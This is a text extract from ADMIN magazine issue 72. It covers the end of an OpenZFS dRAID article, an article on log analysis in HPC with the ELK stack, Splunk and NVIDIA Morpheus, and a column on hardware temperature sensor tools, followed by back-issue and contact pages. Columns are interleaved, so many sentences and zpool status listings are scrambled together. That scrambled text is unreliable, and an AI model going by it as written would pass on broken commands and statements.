drives, and finally the total number in the pool, whereas in the RAIDz /sys/block/sdf/device/state
of children. If executed without error, example, a single spare drive remains
zpool status would output something idle until a failure occurs. When the drive failure is detected on
like Listing 1. For reference purposes, To exercise this feature, you will need the next I/O operation to the pool, the
with a traditional single-parity RAIDz to “fail” a drive; the quickest way to distributed spare space will step in to
resume where the failed drive left off
(Listing 3).
The next step is to take the failed
drive from the ZFS pool offline to
simulate a drive replacement:

# zpool offline myvol2 sdf


# echo running >U
/sys/block/sdf/device/state
# zpool online myvol2 sdf

A resilver (resyncing, or rebuilding, a


degraded array) is initiated across all
drives within the pool (Listing 4).

Conclusion
The OpenZFS project is the first
freely distributed open source stor-
age management solution to offer a
parity declustered RAID feature. As
stated earlier, the biggest advantage
to using dRAID is that resilvering
times are greatly reduced over the
Figure 2: A simplified RAID 5 with a spare layout compared with a parity declustered layout. traditional RAIDz, and restoring the

Figure 3: A simplified dRAID layout compared with RAIDz. © OpenZFS project

86 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
dRAID N U TS A N D B O LTS

pool back to full redundancy can be accomplished Listing 3: Spare Drive Stepping In
in a fraction of the time. As drive capacities con-
tinue to increase, this feature alone will continue # zpool status
to show its value. Q pool: myvol2
state: DEGRADED
status: One or more devices could not be used because the label is missing or
Info
invalid. Sufficient replicas exist for the pool to continue
[1] OpenZFS Project page: [https://www.openzfs.org]
functioning in a degraded state.
[2] OpenZFS dRAID documentation: action: Replace the device using 'zpool replace'.
[https://openzfs.github.io/openzfs-docs/Basic%20Concepts/ see: https://openzfs.github.io/openzfs-docs/msg/ZFS-8000-4J
dRAID%20Howto.html] scan: scrub in progress since Mon Oct 24 17:11:22 2022
80.7M scanned at 80.7M/s, 133M issued at 133M/s, 81.6M total
Author 0B repaired, 163.06% done, no estimated completion time
Petros Koutoupis is a senior performance software engineer scan: resilvered (draid1:3d:5c:1s-0) 20.2M in 00:00:00 with 0 errors on Mon Oct 24
at Cray (now HPE) for its Lustre High Performance File System 17:11:22 2022
config:
division. He is also the creator and maintainer of the RapidDisk
Project ([www.rapiddisk.org]). Petros has worked in the data stor-
NAME STATE READ WRITE CKSUM
age industry for well over a decade and has helped to pioneer the myvol2 DEGRADED 0 0 0
many technologies unleashed in the wild today. draid1:3d:5c:1s-0 DEGRADED 0 0 0
sdb ONLINE 0 0 0
Listing 1: dRAID zpool status sdc ONLINE 0 0 0
# sudo zpool status sdd ONLINE 0 0 0
pool: myvol2 sde ONLINE 0 0 0
state: ONLINE spare-4 DEGRADED 0 0 0
config: sdf UNAVAIL 3 397 0
draid1-0-0 ONLINE 0 0 0
spares
NAME STATE READ WRITE CKSUM
draid1-0-0 INUSE currently in use
myvol2 ONLINE 0 0 0
draid1:3d:5c:1s-0 ONLINE 0 0 0
errors: No known data errors
sdb ONLINE 0 0 0
sdc ONLINE 0 0 0
sdd ONLINE 0 0 0 Listing 4: Resilvering
sde ONLINE 0 0 0
sdf ONLINE 0 0 0 # zpool status
pool: myvol2
spares
state: ONLINE
draid1-0-0 AVAIL
status: One or more devices is currently being resilvered. The pool will
continue to function, possibly in a degraded state.
errors: No known data errors
action: Wait for the resilver to complete.
scan: resilver in progress since Mon Oct 24 17:13:44 2022
Listing 2: RAIDz zpool status 15.0G scanned at 3.00G/s, 5.74G issued at 1.15G/s, 15.0G total
709M resilvered, 38.29% done, 00:00:08 to go
# zpool status
config:
pool: myvol1
state: ONLINE
NAME STATE READ WRITE CKSUM
config:
myvol2 ONLINE 0 0 0
draid1:3d:5c:1s-0 ONLINE 0 0 0
NAME STATE READ WRITE CKSUM sdb ONLINE 0 0 0 (resilvering)
myvol1 ONLINE 0 0 0 sdc ONLINE 0 0 0 (resilvering)
raidz1-0 ONLINE 0 0 0 sdd ONLINE 0 0 0 (resilvering)
sdb ONLINE 0 0 0 sde ONLINE 0 0 0 (resilvering)
sdc ONLINE 0 0 0 spare-4 ONLINE 0 0 0
sdd ONLINE 0 0 0 sdf ONLINE 3 397 0 (resilvering)
sde ONLINE 0 0 0 draid1-0-0 ONLINE 0 0 0 (resilvering)
spares spares
sdf AVAIL draid1-0-0 INUSE currently in use

errors: No known data errors errors: No known data errors

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 87
N U TS A N D B O LTS Analyzing Logs in HPC

Log analysis in high-performance computing

State of the Cluster


Log analysis can be used to great effect in HPC systems. We present an with the use of log analysis on your
HPC systems. Before going there, I’ll
overview of the current log analysis technologies. By Jeff Layton look at the list of technologies pre-
sented at the beginning of this article.
Gathering logs from distributed take advantage of all the information
systems for manual searching is contained in logs: Log analysis can Ingestion and Centralization
a typical task performed in high- be used to improve system adminis-
performance computing (HPC) [1]. tration skills. The ingestion and centralization step
Log analysis is important for cyberse- When analyzing or just watching is important for HPC systems because
curity, understanding HPC cluster be- logs over a period of time, you can of their distributed nature. Larger
havior, and event and trend analysis. get a feel for the rhythm of your sys- systems would use methods that
In this article, I address the state of tems; for example: When do people ingest the logs to a dedicated central-
the art in log analysis and how it can log in and out of the system? What ized server, whereas smaller systems
be applied to HPC. kernel modules are loaded? What, if or smaller logs could use a virtual
any, errors occur (and when)? The machine (VM). Of course, these logs
Origins answers to these questions allow need to be tagged with the originating
you to recognize when things don’t system so they can be differentiated.
Log analysis can produce information seem quite right with the systems When you get to the point of log
through a variety of functions and (events) that “normal” log analysis analysis, you really aren’t just talk-
technologies, including: might miss. A great question is: Why ing about system logs. Log inges-
Q ingestion does user X have a new version of tion also means logs from network
Q centralization an application? Normal log analysis devices, storage systems, and even
Q normalization would not care about this query, but applications that don’t always write
Q classification and logging perhaps the user needed a new ver- to /var/log.
Q pattern recognition sion and could indicate that others A key factor that can be easily
Q correlation analysis might also need the newer version, neglected in log collection from
Q monitoring and alerts prompting you to build and make it disparate systems and devices is
Q artificial ignorance available to all. the time correlation of these logs.
Q reporting Developing an intuition of how a If something happens on a system
Logs are great for checking the health system or, in HPC, systems behave at a particular time, other systems
Photo by Kier... in Sight on Unsplash

of a set of systems and can be used can take a long time and might be might have been affected, as well.
to locate obvious problems, such as impossible to achieve, but it can also The exact time of the event is needed
kernel modules not loading. They can be accomplished by watching logs. If to search across logs from other
also be used to find attempts to break you happen to leave or change jobs, a systems and devices to correlate all
into systems through various means, new admin would have to start from logs. Therefore, enabling the Net-
including shared credentials. How- scratch to develop this systems intu- work Time Protocol (NTP) [2] on all
ever, these examples do not really ition. Perhaps you have a better way systems is critical.

88 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Analyzing Logs in HPC N U TS A N D B O LTS

Normalization you might think: If a user’s applica- lot of day-to-day activities are impor-
tion doesn’t run as well today as it tant to know but are lost when artifi-
Normalization is just what it sounds did yesterday, you have to determine cial ignorance is used.
like: the process of converting all or whether any new events occurred be- Although keeping or watching every-
parts of the log content to the same fore the latest run. More specifically: day activities might seem like Ground-
format – most importantly for items What happens when a user’s applica- hog Day, I feel it is important for
such as the time stamp of the log en- tion crashes? Do any events in the understanding the system. Dumping
try and the IP address. logs across various devices explain this data before you have a chance to
The tricky bit of normalization is auto- what could have caused this problem? develop this understanding is prema-
mation. Some logging tools understand ture, in my opinion.
formats from various sources, but not Monitoring and Alerts Ignoring the uninteresting data could
all of them. You might have to write a also hinder understanding an event.
bit of code to convert the log entries Log analysis tools usually include the In the previous section on Correla-
into a format suitable for the analysis. ability to notify you about events that tion Analysis, when an event occurs,
The good news is that you only have to might require human intervention. you want to gather as much informa-
do this once for each source of log en- These events can be tied to alerts in tion around that event as possible.
tries, of which there aren’t many. various forms, such as email or dash- Artificial ignorance might ignore log
boards, so you are promptly notified. entries that are related to the event
Classification and Ordering A good simple example is the loss of but appear to be uninteresting. They
a stream of events to a system log. could even be deleted, handicapping
You can mix all of your logs into a This usually requires a human to find your understanding of the event.
single file or database, but this can out why the stream stopped. Lastly, this data can be important for
make analysis difficult because the A second example is if environmental other tasks or techniques in log analy-
logs contain different types of in- properties in a data center go beyond sis, as a later section will illustrate.
formation. For example, a log entry their normal levels. Early in my career
from a user logging onto a system has a small group of engineers wanted to Reporting
information that is different from a have a meeting in a data center, so they
network storage device logging data turned off all of the air conditioning Log analysis tools can create notifica-
throughput over the last five seconds. units because they were too loud. As tions and alerts, but many (most) of
You can classify the log messages into the ambient temperature went above a the tools can create a report of their
different classes, add tags to messages critical temperature, I got several email analysis, as well. The report is custom-
with keywords, or use both tech- messages and a beeper page. (That ized to your system and probably your
niques for better log organization. shows you how long ago it was.) management because you will want to
see all system problems – or at the very
Pattern Recognition Artificial Ignorance least, a summary view of the events.
Reports can also be your answer to
Pattern recognition tools are typically Because hardware problems are fairly compliance requests, with all the infor-
used to filter incoming messages (log rare overall, log analysis tools have mation needed to prove compliance (or
entries) according to a set of known implemented what they call “artificial show non-compliance). This feature is
patterns. This method allows com- ignorance,” which uses a machine critical in Europe, where the General
mon events to be separated out or learning (ML) approach to discard log Data Protection Regulation (GDPR) top-
handled differently from events that entries that have been defined as “un- ics are very important. If a request to
do not fit the pattern. interesting.” Commonly, these entries remove specific data has been made,
Although it might sound like you are typical of a system that is operat- you must be able to prove that it was
wouldn’t have to collect and store so ing normally and that don’t provide done. A log analysis tool should be able
much log information, (1) you have any useful information (however “use- to confirm this in a report.
to define the benign patterns, and (2) ful” is defined). The idea is to save log
you can lose quite a bit of informa- storage by ignoring and even deleting Examples of Log Analysis
tion (more on that later in the article). this uninteresting information.
My opinion, with which you can agree
Stacks and Tools
Correlation Analysis or disagree, is that artificial ignorance All of the log analysis tools and
is not something I would enable for a stacks are different, flexible, and
Correlation analysis is a way to find long time. The uninteresting logs can run in a specific manner. Some are
all of the entries associated with provide information about how the created from various components,
an event, even if they are in differ- system typically runs. For example, usually open source, and others are
ent logs or have different tags. This when do people log in to the system? monolithic tools, so it would be too
method can be more important than When do users typically run jobs? A difficult to examine them all. Rather,

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 89
N U TS A N D B O LTS Analyzing Logs in HPC

I’m going to focus on a log analysis Q Elastic Stack (aka the ELK stack), together and with other AWS services.
stack concept that illustrates the tools which includes Elasticsearch The Elastic company [5] develops the
that fulfill the various tasks described (search and analytics engine), tools in the ELK and Elastic stacks,
at the beginning of the article. In Logstash (log collection transforma- offers support, and develops commer-
this way, I hope to orient you in the tion), Kibana (visualization), and cial plugins.
correct direction for deploying a log Beats (data shippers, not really part
analysis capability. of ELK, but added to Elastic Stack) Gathering the Data
Q Fluentd (open source)
Splunk Q Sumo Logic (commercial) Logstash serves the purpose of gath-
Q Loggly (uses open source tools, ering and transforming logs from the
Although I’m a big supporter of open including Elasticsearch, Apache various servers (classification and
source, Splunk [3], a commercial Lucene, and Apache Kafka) ordering) by ingesting the logs or data
product, is probably the gold standard Q Graylog (open and commercial from the specified sources and nor-
for a combination log collection and versions) malizing, classifying, and ordering it
log analysis tool. It is the template Most of the open source tool stacks before sending it to the search engine,
security incident and event manage- have a company behind them that of- which is Elasticsearch in the ELK or
ment (SIEM) tool that all others use fers support, proprietary plugins, ad- in Elastic stack.
for comparison. Honestly, though, ditional capability, or a combination Installing and configuring Logstash is
Splunk is pretty costly for an HPC of features for a price. covered in an article from Elastic [6].
system and may be overkill. Rather than dig into the tools and Each client system runs a small tool
Splunk came out in 2003 and was stacks, I’m going to discuss the ELK named Filebeat that collects data from
very quickly a big success. Arguably, stack and its components briefly. This files on that server and sends it to the
it was the first enterprise-grade log stack was the original open source log server that is running Logstash.
collection and analysis tool that could log analysis stack designed to replace This tool allows you to specify system
monitor logs from many different Splunk but has morphed into the logs or the output of any scripts you
devices and applications and locate Elastic Stack while adding an addi- create or any applications.
patterns in real time. It also uses ma- tional tool, Beats, a collection of data Filebeat takes the place of log gather-
chine learning in its analysis, which shipper tools. ing tools such as syslog-ng or rsyslog in
was very innovative at the time and general but isn’t strictly necessary. If
set the bar for similar tools. Splunk Elastic Stack (ELK) you have a server already logging to a
has a great number of features, is central log, you can install Filebeat on
easy to install, uses data indices and ELK stands for Elasticsearch, Log- that server and the logs will be trans-
events, and can ingest data from stash, and Kibana and was put to- mitted to the Logstash server as JSON
many sources. For an enterprise-grade gether to provide a complete log man- (JavaScript Object Notation), which can
tool, all of these features made it agement and analysis stack that is be the same server, easing the upgrade
unique and powerful. all open source and competitive with from just log collection to log analysis.
Sites started using Splunk, and its Splunk. The steps or tenets for log
popularity grew and grew. However, collection, management, and analysis Searching the Data
as I mentioned, it’s fairly expensive, and the tools that fulfill these steps in
particularly for HPC systems, which the ELK stack are: Logstash gathers the logs and trans-
has led to log analysis stacks and Q log collection (Logstash) forms them into a form the search
tools developed to compete with Q log/data conversion/formatter engine, Elasticsearch [7], can then con-
Splunk but still be open source, less (Logstash) sume (JSON). Elasticsearch is an open
expensive at the very least, or both. Q log search/analysis (Elasticsearch) source tool that is based on the Apache
Q visualization (Kibana) Lucene library [8]. You can configure
Splunk Alternatives A fourth tool, Beats, a collection of Elasticsearch to gather whatever infor-
lightweight data shippers, was later mation you need or want, but the de-
Given the preeminence of Splunk and added to the stack, which was re- faults [9] are a good place to start.
the associated cost, people naturally named Elastic Stack. Besides being open source, Elastic-
will look for Splunk alternatives [4]. The ELK stack was a big hit because search has some attractive features.
An article about Splunk alternatives it was totally open source and pro- One aspect that HPC users will under-
presents a few options but is not vided a good portion of the capabil- stand and appreciate is that it is dis-
necessarily comprehensive. From that ity found in Splunk. Its popularity tributed. If you have lots of data and
article, I gleaned a few options: grew quickly and even Amazon Web want to improve performance, you
Q LogDNA (commercial with open Services (AWS) offered the ELK stack can shard data across several servers.
source agent; software as a service components as managed services. Elasticsearch also has near real-
(SaaS)) These components can be used time performance, perhaps close

90 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Analyzing Logs in HPC N U TS A N D B O LTS

to Spunk’s performance, that gives Most importantly, however, they fulfill 10 classes. You can see the effect of
you quick insight into problems and the components of a log analysis sys- a bad distribution if you run test im-
perhaps overcomes them as quickly. tem mentioned earlier: log collection, ages through the model and it has
While doing the searching, it creates log data conversion and formatter, log difficulty classifying images into a
an index for the data that is very use- search and analysis, and visualization. specific class. It might identify a cat
ful if you want to see all of the data as a dog if you don’t have enough
related to an event, look back at the AI data, enough data in each class, or a
system logs and data, or both. broad enough data set.
The core of Elasticsearch is in Java, In the previous discussion about the If you are interested in special im-
but it has clients in various lan- technologies used in log analysis, ma- ages or events that happen only very
guages, including, naturally, Java, but chine learning was discussed – in par- rarely, developing an appropriate da-
also .NET (C#), PHP, Apache Groovy, ticular, artificial ignorance, which uses taset is very difficult and, as a result,
Ruby, JavaScript, Go, Perl, Rust, and machine learning to ignore and possi- makes it difficult to create an ade-
Python. These choices provide a great bly discard log entries before searching quately trained model. An example of
deal of flexibility of Elasticsearch. the data. Pattern recognition also uses this is fraud detection. The model is
In addition to developing all the tools machine learning. As I discussed, al- supposed to identify when a fraudu-
in the stack – Logstash, Elasticsearch, though I don’t know the details of how lent transaction happens. However,
Kibana (more on that in the next sec- the machine learning models make de- these are very rare events despite
tion), and Beats – Elastic also created cisions, I am not a big fan of discarding what certain news agencies say.
the Elastic Cloud service. data just because it looks normal. Such If you take data from transaction pro-
data might be very useful in training cessing, you will have virtually the
Visualizing the Data deep learning models. entire dataset filled with non-fraudu-
A deep learning model uses neural lent data. Perhaps only a single-digit
Humans are great pattern recognition networks to process input to create number of fraudulent transactions
engines. We don’t do well with text some sort of output. These networks are in the dataset, so you have mil-
zooming on the screen, but we can pick are trained with sample data for lions of non-fraudulent transactions
out patterns in visual data. To help, the the inputs and have the matching and maybe three or four fraudulent
tool Kibana [10] ties into Elastic Stack expected output(s). To train such a transactions – most definitely a very
to provide visualization. At a high level, model adequately, you need a very unbalanced dataset.
it can create various charts of pretty large amount of data that spans a For these types of situations, you invert
much whatever you want or need. wide range of conditions. the problem by creating a model to find
Installing Kibana (Figure 1) is easiest The data should be balanced accord- the non-fraudulent transactions. Now
from your package manager. If you ing to the desired outputs for non- you have a data set that is useful in
read through the configuration docu- language models. For example, if you creating the model. You are throwing
ment, you will see lots of options. I want to identify an image and have millions of transactions at the model for
recommend starting with the defaults defined 10 possible image classes, it to learn with basically one output: Is
[11] before changing any of them. The then the input data should be fairly the transaction fraudulent? A fraudu-
documentation starts with alert and evenly distributed across each of the lent transaction will then be relatively
action settings
followed by
lots of other
configuration
options.

ELK Stack
Wrap Up
Other compo-
nents plug into
the ELK stack.
Fortunately,
they have been
tested and de-
veloped some-
what together
so they should
“just work.” Figure 1: Sample Kibana screenshot (CC BY-SA 4.0).

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 91
N U TS A N D B O LTS Analyzing Logs in HPC

easy for the model to detect. Of course, service, account, and machine system. However, don’t think of
other approaches will work, but this across the enterprise data center – log analysis as just a cybersecurity
is a somewhat common approach of employing unsupervised learning to tool. You can use it for many HPC-
training models to detect rare events. flag when user and machine activ- specific tasks, greatly adding to the
Therefore, you shouldn’t discard the ity patterns shift,” which is great to administration of the system. Plus
non-interesting data, because it can be watch for break-ins on HPC systems it can make pretty reports, which
used to train a neural network model but also to watch for shifting pat- management always loves.
that is very useful. terns. Instead of developing a fin- The future of log analysis will prob-
In the case of HPC systems, the trained gerprint of user behavior, it could ably morph into an AI-based tool
deep learning model can be used to be used to create a fingerprint of that takes the place of several of the
augment your observations as to the application versions. technologies in current log analysis.
“normal” behavior of a system. If For example, a user might start out Instead of a single trained AI, a feder-
something doesn’t seem typical, then using a specific version of an applica- ated set of trained networks will prob-
the model can quickly notify you. In tion, but as time goes on, perhaps ably be used. Other models will likely
HPC systems, non-typical events can they use a newer version. This event go back and review past logs, either
be infrequent. For example, a user signals the administrator to install for training or to create a behavior de-
starts logging into the system at a later and support the new version and con- scription of how the cluster operates.
time than usual or they start running sider deprecating any old versions. This area of HPC technology has lots
different applications. Therefore, the This scenario is especially likely in of opportunities. Q
data set for HPC systems could have a deep learning applications because
fair number of events, and you don’t frameworks develop quickly, new Info
have to “invert” the model to look for frameworks are introduced, and other [1] “Log Management” by Jeff Layton:
non-events. frameworks stop being developed. [https://www.admin-magazine.com/HPC/
Another example might be job Articles/Log-Management]
NVIDIA Morpheus queues that are becoming longer [2] NTP: [https://en.wikipedia.org/wiki/
than usual, perhaps indicating that Network_Time_Protocol]
I want to mention a new tool from more resources are needed. A model [3] Splunk: [https://www.splunk.com/en_us/
NVIDIA designed for cybersecurity. that detects this event and creates blog/learn/log-management.html]
In full disclosure, I work for NVIDIA information as to why would be ex- [4] Splunk alternatives:
as my day job, but I’m not endorsing tremely useful. [https://www.mezmo.com/blog/5-splunk-
the product, nor do I have any inside The framework could also be used to alternatives-for-logging-their-benefits-
knowledge of the product, so I will watch data storage trends. Certainly shortcomings-and-which-one-to-choose]
use publicly available links. That said, storage space will increase, but [5] Elastic: [https://www.elastic.co/]
NVIDIA has a new software develop- which users are consuming the most [6] Logstash: [https://www.elastic.
ment kit (SDK) that addresses cyber- space or have the most files can be co/guide/en/logstash/current/
security with neural network models. identified and watched in case it is getting-started-with-logstash.html]
The SDK, called Morpheus [12], is something unusual (like download- [7] Elasticsearch: [https://en.wikipedia.org/
“… an open application framework ing too many KC and The Sunshine wiki/Elasticsearch]
that enables cybersecurity developers Band mp4s to the HPC). There really [8] Lucene: [https://lucene.apache.org/]
to create optimized AI pipelines for are no limits to how Morpheus could [9] Elasticsearch defaults: [https://www.
filtering, processing, and classifying be used in HPC, especially for log elastic.co/guide/en/elasticsearch/
large volumes of real-time data.” It analysis in general. reference/current/settings.html]
provides real-time inferencing (not [10] Kibana:
training) on cybersecurity data. Summary [https://en.wikipedia.org/wiki/Kibana]
Log analysis looks for cybersecurity- [11] Kibana defaults: [https://www.elastic.co/
like events and includes actual cy- Log analysis is a very useful tool for guide/en/kibana/current/settings.html]
bersecurity events. The product web many administration tasks. You can [12] Morpheus: [https://developer.NVIDIA.com/
page lists some possible use cases: use it for cybersecurity, understand- morpheus-cybersecurity]
Q digital fingerprinting ing how an HPC cluster normally
Q sensitive information detection behaves, identifying events and The Author
Q crypto mining malware detection trends within the cluster, the need Jeff Layton has been in the
Q phishing detection for more resources, or anything HPC business for over 30
Q fraudulent transaction and identity you want to learn about the clus- years (starting when he was
detection ter. The use of log analysis in your 4 years old). When he’s not
Q ransomware HPC systems is up to you because grappling with a stubborn
The digital fingerprinting use case it can mean adding several servers systemd script, he’s looking for deals for his home
“Uniquely fingerprint(s) every user, and a fair amount of storage to your cluster. His twitter handle is @JeffdotLayton.

92 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Performance Tuning Dojo N U TS A N D B O LTS

System temperature as a
dimension of performance

Heat Seeker
Sensor tools can provide highly variable data from CPUs, GPUs, and a variety of sources. We look at some tools
to verify the temperature of components on diverse hardware. By Federico Lucifredi

Excessive or just elevated tempera-


ture is sometimes the source of unex-
pected behavior in computing compo-
nents – I faced it firsthand once, with
runaway CPU heat burning through
an older Slot I Pentium 3 processor.
The cause was a detached heat sink,
and some older hardware did not
have built-in protection circuitry back
then. I have also had fun experienc-
ing intriguing boot failures from an
overheating hard drive in a system
equipped with one too many periph-
erals. In recent times I have taken a
more preemptive stance, monitoring
the heat build-up in a Raspberry Pi
cluster as the case fan was replaced
(Figure 1) [1]. To silence a desktop
cluster, I replaced the built-in fan
with a slower, silent fan made by spe- Figure 1: Raspberry Pi 4 Picocluster in testing.
cialty vendor Noctua [2]. Because the
newer fan used fewer revolutions per
minute to get the job done, I had to
verify that the temperature inside the
case remained roughly the same after
the change:

vcgencmd measure_temp

The output quickly demonstrated


that the temperature remained
within the same range it had with
Lead Image © Lucy Baldwin, 123RF.com

the older fan. The vcgencmd utility is


a tool made by Broadcom to access
the state of the VideoCore GPU found
on all Raspberry Pi boards [3]. It
can also provide insight into voltage
levels for cores and SDRAM, among Figure 2: vcgencmd extracting temperature and voltage information from a Raspberry Pi
other things, which can come handy GPU. Note the use of parallel SSH syntax to access all nodes in a cluster.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 93
N U TS A N D B O LTS Performance Tuning Dojo

Figure 3: iStats at work on a Mac. The chart of the number of


battery cycles of this old battery is actually blinking in red!

while troubleshooting heat problems istats scan


(Figure 2). command
will look for Figure 4: iStats scanning sensors available on an older MacBook Pro. Not
Terminal UI Redux additional all values discovered are temperatures.
“keys” of
Returning to a common topic on these sensor data available on a given sys- sensors [8] command (apt install
pages, an interesting example of a ter- tem and offer to enable them at the lm-sensors), which is a configurable,
minal user interface (TUI) [4] for the user’s discretion (Figure 4). consistent command-line interface
Mac is the istats tool (install from On Linux, my default choice for in-ter- gathering the multitude sensor data
Ruby Gems with gem install iStats) minal monitoring TUI is glances [6], exposed by a disparate array of Linux
[5]. iStats provides convenient access which I have examined previously for kernel modules (Listing 1; from the
to temperature, battery, and fan speed its many capabilities [7]. Yet, I did same system on which glances was
data on macOS systems (Figure 3). not look at its temperature module, run). Indeed, if this tour of sen-
Its simple and easy-to-use interface an oversight Figure 5 now aims to sor tools and interfaces has shown
belies a hidden complexity. The remedy. Data is sourced from the one thing, it is that the variety of

Figure 5: glances presents temperature data on its left-hand panel whenever it is available.

94 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Performance Tuning Dojo N U TS A N D B O LTS

Listing 1: sensors Output


federico@ferenginar:~$ sensors
k10temp-pci-00c3
Adapter: PCI adapter
temp1: +42.5°C (high = +70.0°C)
(crit = +100.0°C, hyst = +95.0°C)

federico@ferenginar:~$

Listing 2: Extracting Temperature Data


federico@voronoi:~$ sudo smartctl -A /dev/nvme0 | grep
Temperature
[sudo] password for federico:
Figure 6: i7z at work, constantly refreshing CPU state data, including temperatures. Temperature: 42 Celsius
Warning Comp. Temperature Time: 16
Critical Comp. Temperature Time: 28
sensor data available is highly vari- Microserver, every system has pro-
Temperature Sensor 1: 42 Celsius
able. Ranging from a Raspberry Pi, vided different datasets. Often the
federico@voronoi:~$
to a vintage MacBook Pro, to an HP biggest challenge is correctly identify-
ing the source of
the data, which Figure 6 shows the results on an Intel
can originate in Core-equipped laptop. The more gen-
a CPU, a GPU, eral purpose solution is to configure
a management lm-sensors to include kernel mod-
card, and a vari- ules for all sensors available, which
ety of alternative is done through the sensors-detect
sources. command in a way akin to what was
previously described for iStats. With
Let There lm-sensors, you can actually configure
the kernel to load the correct modules
Be Dell at boot time, as recently described
Switching to a by our own Bruce Byfield in sister
fourth system, publication Linux Magazine [10].
this one running Once this configuration step is suc-
Linux on an cessfully accomplished, all data for a
Intel processor, specific system becomes available in
I can make use the usual filesystem locations (usually
of i7z [9], a tool in /sys/), ready to be consumed by
explicitly writ- higher level programs (Figure 7).
ten to visualize One such example is psensor [11],
the state of Intel a GUI application charting select
processors – in- metrics and sensors to facilitate time
Figure 7: The complete range of sensors available on a Dell XPS 13 cluding their series analysis. Not perfectly polished
9360 “Sputnik.” temperature. in its windowing toolkit interactions,

Figure 8: psensor charting some of the sensors listed in Figure 7.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 95
N U TS A N D B O LTS Performance Tuning Dojo

at least in Ubuntu 22.04, it nonethe- [2] Noctua NF-A6x25 PWM, Premium Quiet [9] Abhishek Jaiantilal, i7z:
less remains the best option currently Fan, 4-Pin (60mm): [https://www.amazon. [https://github.com/ajaiantilal/i7z]
available (Figure 8). com/gp/product/B00VXTANZ4/] [10] “Taking Your Hardware’s Temperature” by
[3] vcgencmd on Embedded Linux: Bruce Byfield, Linux Magazine, issue 261,
Disk Sensors [https://elinux.org/RPI_vcgencmd_usage] August 2022, pg. 44,
[4] “Network Performance In-Terminal Graph- [https://www.linuxpromagazine.com/
The all-purpose smartctl utility offers ics Tools” by Federico Lucifredi, ADMIN, Issues/2022/261/Beat-the-Heat]
storage device temperature data (apt issue 51, 2019, pg 94, [11] Francis Chin, psensor:
install smartmontools) [12] equally [https://www.admin-magazine.com/ [https://github.com/chinf/psensor]
well for spinning media and solid- Archive/2019/51/Network-performance-in- [12] smartmontools: [https://github.com/
state NVMe storage (Listing 2; from terminal-graphics-tools] smartmontools/smartmontools/]
a persistent storage SMART source). [5] Christophe Naud-Dulude, iStats:
It is generally advisable to maintain [https://github.com/Chris911/iStats] Author
storage media under 60°C (140°F), [6] Nicolas Hennion, glances: Federico Lucifredi (@0xf2) is the Product
with the actual drive’s specification [https://github.com/nicolargo/glances] Management Director for Ceph Storage at Red
having the final say. Q [7] “Next-Generation Terminal UI Tools” Hat and formerly the Ubuntu Server Product
by Federico Lucifredi, ADMIN, is- Manager at Canonical and the Linux “Systems
sue 64, 2021, pg. 93, [https://www. Management Czar” at SUSE. He enjoys arcane
Info admin-magazine.com/Archive/2021/64/ hardware issues and shell-scripting mysteries
[1] Sound-proofing a Picocluster: Next-generation-terminal-UI-tools] and takes his McFlurry shaken, not stirred. You
[https://twitter.com/0xF2/status/ [8] lm-sensors repository: [https://github. can read more from him in the new O’Reilly title
1244422315011645444] com/lm-sensors/lm-sensors] AWS System Administration.
Back Issues S E RV I C E

ADMIN Network & Security

NEWSSTAND Order online:


bit.ly/ADMIN-Newsstand

ADMIN is your source for technical solutions to real-world problems. Every issue is packed with practical
articles on the topics you need, such as: security, cloud computing, DevOps, HPC, storage, and more!
Explore our full catalog of back issues for specific topics or to complete your collection.

#71 – September/October 2022


Kubernetes
We show you how to get started with Kubernetes, and users share
their insights into the container manager.
On the DVD: SystemRescue 9.04

#70 – July/August 2022


Defense by Design
Nothing is so true in IT as “Prevention is better than the cure.” We
look at three ways to prepare for battle.
On the DVD: Rocky Linux 9 (x86_64)

#69 – May/June 2022


Terraform
After nearly 10 years of work on Terraform, the HashiCorp team
delivers the 1.0 version of the cloud automation tool.
On the DVD: Ubuntu 22.04 “Jammy Jellyfish” LTS server Edition

#68 – March/April 2022


Automation in the Enterprise
Automation in the enterprise extends to remote maintenance, cloud
orchestration, and network hardware
On the DVD: AlmaLinux 8.5 (minimal)

#67 – January/February 2022


systemd Security
This issue, we look at how to secure systemd services and its
associated components.
On the DVD: Fedora 35 Server (Install)

#66 – November/December 2021


Incident Analysis
We look at updating, patching, and log monitoring container apps
and explore The Hive + Cortex optimization.
On the DVD: Ubuntu 21.10 “Impish Indri” Server Edition

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 97
S E RV I C E Contact Info / Authors

WRITE FOR US
Admin: Network and Security is looking • unheralded open source utilities
for good, practical articles on system ad- • Windows networking techniques that
ministration topics. We love to hear from aren’t explained (or aren’t explained
IT professionals who have discovered well) in the standard documentation.
innovative tools or techniques for solving We need concrete, fully developed solu-
real-world problems. tions: installation steps, configuration
Tell us about your favorite: files, examples – we are looking for a
• interoperability solutions complete discussion, not just a “hot tip”
• practical tools for cloud environments that leaves the details to the reader.
• security problems and how you solved If you have an idea for an article, send
them a 1-2 paragraph proposal describing your
• ingenious custom scripts topic to: edit@admin-magazine.com.

Contact Info
Editor in Chief While every care has been taken in the content of
Joe Casad, jcasad@linuxnewmedia.com the magazine, the publishers cannot be held re-
Managing Editors sponsible for the accuracy of the information con-
Rita L Sooby, rsooby@linuxnewmedia.com tained within it or any consequences arising from
Lori White, lwhite@linuxnewmedia.com the use of it. The use of the DVD provided with the
Senior Editor magazine or any material provided on it is at your
Ken Hess own risk.
Localization & Translation Copyright and Trademarks © 2022 Linux New
Ian Travis Media USA, LLC.
News Editor No material may be reproduced in any form
Authors Amber Ankerholz whatsoever in whole or in part without the writ-
Amber Ankerholz 6 Copy Editors ten permission of the publishers. It is assumed
Amy Pettle, Aubrey Vaughn that all correspondence sent, for example, let-
Ulrich Bantle 10 ters, email, faxes, photographs, articles, draw-
Layout
Klaus Bierschenk 64 Dena Friesen, Lori White ings, are supplied for publication or license to
third parties on a non-exclusive worldwide
Chris Cowen 80 Cover Design
basis by Linux New Media unless otherwise
